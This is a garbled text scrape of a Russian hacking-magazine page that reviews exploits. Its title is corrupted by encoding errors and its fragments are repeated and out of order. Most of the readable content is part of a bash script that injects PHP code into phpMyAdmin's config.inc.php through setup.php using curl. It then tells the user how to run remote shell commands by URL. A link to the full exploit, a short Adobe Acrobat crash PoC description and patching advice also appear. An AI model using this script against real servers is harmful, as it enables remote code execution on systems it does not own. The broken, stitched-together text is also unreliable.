ÃÂÕáÛãçÃÂÙÃÂÞ CUDA ØÔÕÃÂœ? phpMyAdmin - Xakep Online
ÃÂÕáÛãçÃÂÙÃÂÞ CUDA ØÔÕÃÂœ? phpMyAdmin - Xakep Online
ÃÂÕáÛãçÃÂÙÃÂÞ CUDA ØÔÕÃÂœ? phpMyAdmin - Xakep Online
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
взлом<br />
обзор<br />
эксплоитов<br />
обзор<br />
эксплоитов<br />
обзор<br />
эксплоитов<br />
ор<br />
плоитов<br />
ОШИБКА ТУПАЯ ДО БОЛИ<br />
ор<br />
плоитов<br />
ор<br />
плоитов<br />
СЕГОДНЯ НЕ НАШ ДЕНЬ. ПРИДЕТСЯ ПИСАТЬ АВТОСКАНЕР...<br />
flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"<br />
echo "[+] attempting to inject phpinfo() ..."<br />
curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.<br />
php" >/dev/null<br />
if curl -ks --url "$3/config/config.inc.php" | grep<br />
"phpinfo()" >/dev/null<br />
then<br />
curl -ks --url "$3/config/config.inc.php" >$flag<br />
echo "[+] success! phpinfo() injected successfully!<br />
output saved on $flag"<br />
curl -ks -b $2 -d $postdata2 --url "$3/scripts/<br />
setup.php» >/dev/null<br />
echo "[+] you *should* now be able to remotely run<br />
shell commands and PHP code using your browser. i.e.:"<br />
echo " $3/config/config.inc.php?c=ls+-l+/"<br />
echo " $3/config/config.inc.php?p=phpinfo();"<br />
echo " please send any feedback/improvements for<br />
this script to"\<br />
"unknown.pentestergmail.com"<br />
else<br />
>> Brief<br />
Очередная темная лошадка на арене PoC появилась в начале июня.<br />
На этот раз, по заявлениям неизвестных багоискателей, обнаружилась<br />
брешь в Adobe Acrobat аж до версии 9.1.1. В паблик выложили лишь<br />
PoC-эксплойт, при запуске которого ничего не происходит. Точнее, происходит<br />
— вываливается среда, из которой был запущен PoC. Если это<br />
браузер — закрываются все вкладки IE/Firefox/Opera/Mozilla. Если это<br />
сам Acrobat Reader — то и он вылетает. Короче говоря, сплойт действительно<br />
сшибает с ног Adobe Reader.<br />
Почему же так происходит? Чтобы это выяснить, бережно скачаем PDF’ку<br />
каким-нибудь сторонним менеджером (я использовал wget на удаленном<br />
сервере) и присмотримся к исходному коду файла. Для простоты<br />
восприятия, помещаю его ниже.<br />
%PDF-1.4<br />
%<br />
4 0 objendobj<br />
5 0 objstream<br />
endstream<br />
endobj<br />
3 0 objendobj<br />
2 0 objendobj<br />
НЕМЕДЛЕННОЕ ОБНОВЛЕНИЕ<br />
ор<br />
плоитов<br />
echo "[+] no luck injecting to $3/config/config.inc.<br />
php :("<br />
exit<br />
fi<br />
}<br />
Если ты не поленишься написать простенький PHP-парсер передаваемых<br />
строк, то получишь посимвольную картину инжекта.<br />
Полный код эксплойта можно скачать по ссылке securitylab.ru/poc/<br />
extra/381413.php.<br />
ор<br />
плоитов<br />
>> Targets:<br />
Уязвимыми версиями <strong>phpMyAdmin</strong> являются 2.11.x до 2.11.9.5 и 3.x до<br />
3.1.3.1 (все релизы достаточно новые и выпускались до апреля этого<br />
года).<br />
ор<br />
плоитов<br />
>> Solution<br />
Нависшую угрозу безопасности решит либо удаление файла «/scripts/<br />
setup.php», либо изолирование каталога «/config» вне Web-директории,<br />
либо (самый предпочтительный вариант) обновление <strong>phpMyAdmin</strong> до<br />
свежей версии. Последнее можно осуществить с официальной локации:<br />
sourceforge.net/projects/phpmyadmin.<br />
03<br />
ADOBE ACROBAT 9.1.1 STACK OVERFLOW<br />
CRASH POC EXPLOIT<br />
ор<br />
плоитов<br />
050<br />
XÀÊÅÐ 07 /127/ 09